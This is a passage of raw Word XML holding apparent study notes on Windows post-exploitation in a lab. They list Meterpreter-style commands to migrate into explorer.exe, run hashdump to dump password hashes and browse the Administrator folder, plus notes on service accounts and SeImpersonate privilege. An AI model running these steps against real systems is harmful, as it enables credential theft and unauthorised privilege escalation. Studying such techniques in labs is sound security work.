    <w:p w14:paraId="0C0D71E2" w14:textId="4311D9B0" w:rsidR="009B14CF" w:rsidRPr="009B14CF" w:rsidRDefault="009B14CF">
      <w:r>
        <w:t xml:space="preserve"># it show the error because the current process that we are using still have the access token assign to the </w:t>
      </w:r>
      <w:r w:rsidRPr="003A4E6E">
        <w:t>NT AUTHORITY\LOCAL SERVICE</w:t>
      </w:r>
      <w:r>
        <w:t>, so we have to change the process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D5B468" w14:textId="77777777" w:rsidR="003A4E6E" w:rsidRDefault="003A4E6E"/>
    <w:p w14:paraId="26B299A1" w14:textId="77777777" w:rsidR="00C40EB3" w:rsidRDefault="009B14CF">
      <w:r>
        <w:t>Ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA0D2E5" w14:textId="77777777" w:rsidR="00C40EB3" w:rsidRDefault="00C40EB3">
      <w:r>
        <w:t># migrate to explorer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C5893B" w14:textId="4701081B" w:rsidR="009B14CF" w:rsidRDefault="009B14CF">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D4D878" w14:textId="77777777" w:rsidR="00C40EB3" w:rsidRDefault="009B14CF">
      <w:r>
        <w:t>Migrate</w:t>
      </w:r>
      <w:r w:rsidR="00C40EB3">
        <w:t xml:space="preserve"> pid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BDBE98" w14:textId="3950F507" w:rsidR="009B14CF" w:rsidRDefault="009B14CF">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBCA32A" w14:textId="4F0F3096" w:rsidR="00C40EB3" w:rsidRDefault="00C40EB3">
      <w:r>
        <w:t>Hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABA2A07" w14:textId="15764BA1" w:rsidR="00C40EB3" w:rsidRDefault="00C40EB3">
      <w:r>
        <w:t># now show the hash dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13695C4D" w14:textId="77777777" w:rsidR="00C40EB3" w:rsidRDefault="00C40EB3"/>
    <w:p w14:paraId="3900D708" w14:textId="5B781881" w:rsidR="00C40EB3" w:rsidRDefault="00C40EB3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cd c:/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2D0003" w14:textId="43041A05" w:rsidR="00C40EB3" w:rsidRDefault="00C40EB3">
      <w:r>
        <w:t>Cd users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0119E7FB" w14:textId="5B7E095A" w:rsidR="00C40EB3" w:rsidRDefault="00C40EB3">
      <w:r>
        <w:t>Cd Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CBAB8B" w14:textId="1234A2F8" w:rsidR="00C40EB3" w:rsidRDefault="00C40EB3">
      <w:r>
        <w:t># now get access to it .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE94072" w14:textId="77777777" w:rsidR="00C40EB3" w:rsidRDefault="00C40EB3"/>
    <w:p w14:paraId="70ADA577" w14:textId="77777777" w:rsidR="003A4E6E" w:rsidRDefault="003A4E6E"/>
    <w:p w14:paraId="4B6D4C3B" w14:textId="160E29A4" w:rsidR="003A4E6E" w:rsidRPr="003A4E6E" w:rsidRDefault="003A4E6E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A4E6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765B94B8" w14:textId="3261F2D2" w:rsidR="003A4E6E" w:rsidRPr="003A4E6E" w:rsidRDefault="003A4E6E" w:rsidP="003A4E6E">
      <w:r w:rsidRPr="003A4E6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A4E6E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A4E6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Highest-privileged</w:t>
      </w:r>
      <w:r w:rsidRPr="003A4E6E">
        <w:t xml:space="preserve"> built-in account used by the Windows operating system and core services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32654810" w14:textId="7E0EE36E" w:rsidR="003A4E6E" w:rsidRPr="003A4E6E" w:rsidRDefault="003A4E6E" w:rsidP="003A4E6E">
      <w:r w:rsidRPr="003A4E6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NT AUTHORITY\LOCAL SERVICE:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A4E6E">
        <w:t xml:space="preserve"> Built-in account with </w:t>
      </w:r>
      <w:r w:rsidRPr="003A4E6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>limited local privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="003A4E6E">
        <w:t xml:space="preserve"> that runs services using the computer’s </w:t>
      </w:r>
      <w:r w:rsidRPr="003A4E6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>local credentials</w:t>
      </w:r>
      <w:r w:rsidRPr="003A4E6E">
        <w:t xml:space="preserve"> (not over the network).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449F14EF" w14:textId="174E601F" w:rsidR="003A4E6E" w:rsidRDefault="009C0498">
      <w:r>
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:r w:rsidR="00207BC8">
        <w:t>has</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the privilege associated with that exploited service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0C2B28" w14:textId="78C3A83D" w:rsidR="003A4E6E" w:rsidRDefault="003E7B85">
      <w:r w:rsidRPr="003E7B85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>explorer.exe:</w:t>
      </w:r>
      <w:r w:rsidRPr="003E7B85">
        <w:t xml:space="preserve"> Windows process that provides the desktop, taskbar, and file management interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE1487D" w14:textId="77777777" w:rsidR="00207BC8" w:rsidRDefault="00207BC8" w:rsidP="003E7B85"/>
    <w:p w14:paraId="688924DC" w14:textId="54C386E4" w:rsidR="003E7B85" w:rsidRDefault="003E7B85" w:rsidP="003E7B85">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Most </w:t>
      </w:r>
      <w:r w:rsidRPr="005873D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Important is Seimpersonate privilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for this attack.</w:t>
      </w:r>
      <w:r w:rsidR="00CC276D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Only with it this will able to happen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635CE16C" w14:textId="77777777" w:rsidR="003E7B85" w:rsidRDefault="003E7B85" w:rsidP="003E7B85">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D0258C1" w14:textId="77777777" w:rsidR="00917844" w:rsidRPr="005873D0" w:rsidRDefault="00917844"/>
    <w:sectPr w:rsidR="00917844" w:rsidRPr="005873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B755A6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="300E1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5743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D7B"/>
    <w:rsid w:val="000839A5"/>
    <w:rsid w:val="00123C1F"/>
    <w:rsid w:val="001D122D"/>
    <w:rsid w:val="00207BC8"/>
    <w:rsid w:val="00265DE4"/>
    <w:rsid w:val="003A0F60"/>
    <w:rsid w:val="003A4E6E"/>
    <w:rsid w:val="003E7B85"/>
    <w:rsid w:val="00513708"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00576333"/>
    <w:rsid w:val="005873D0"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="0065473B"/>
    <w:rsid w:val="006C7281"/>
    <w:rsid w:val="006E34D5"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00917844"/>
    <w:rsid w:val="009B14CF"/>
    <w:rsid w:val="009C0498"/>
    <w:rsid w:val="00A12C82"/>
    <w:rsid w:val="00B868FA"/>
    <w:rsid w:val="00C02D03"/>
    <w:rsid w:val="00C15D7B"/>
    <w:rsid w:val="00C333B3"/>
    <w:rsid w:val="00C40EB3"/>
    <w:rsid w:val="00CC276D"/>
    <w:rsid w:val="00D00E3D"/>
    <w:rsid w:val="00E10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640A1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B4B0CEDF-C8D5-427F-BB07-26D1A8145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D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D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D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D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D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D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D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D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D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D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D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</Pages>
  <Words>619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28</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-10T19:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-11T11:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>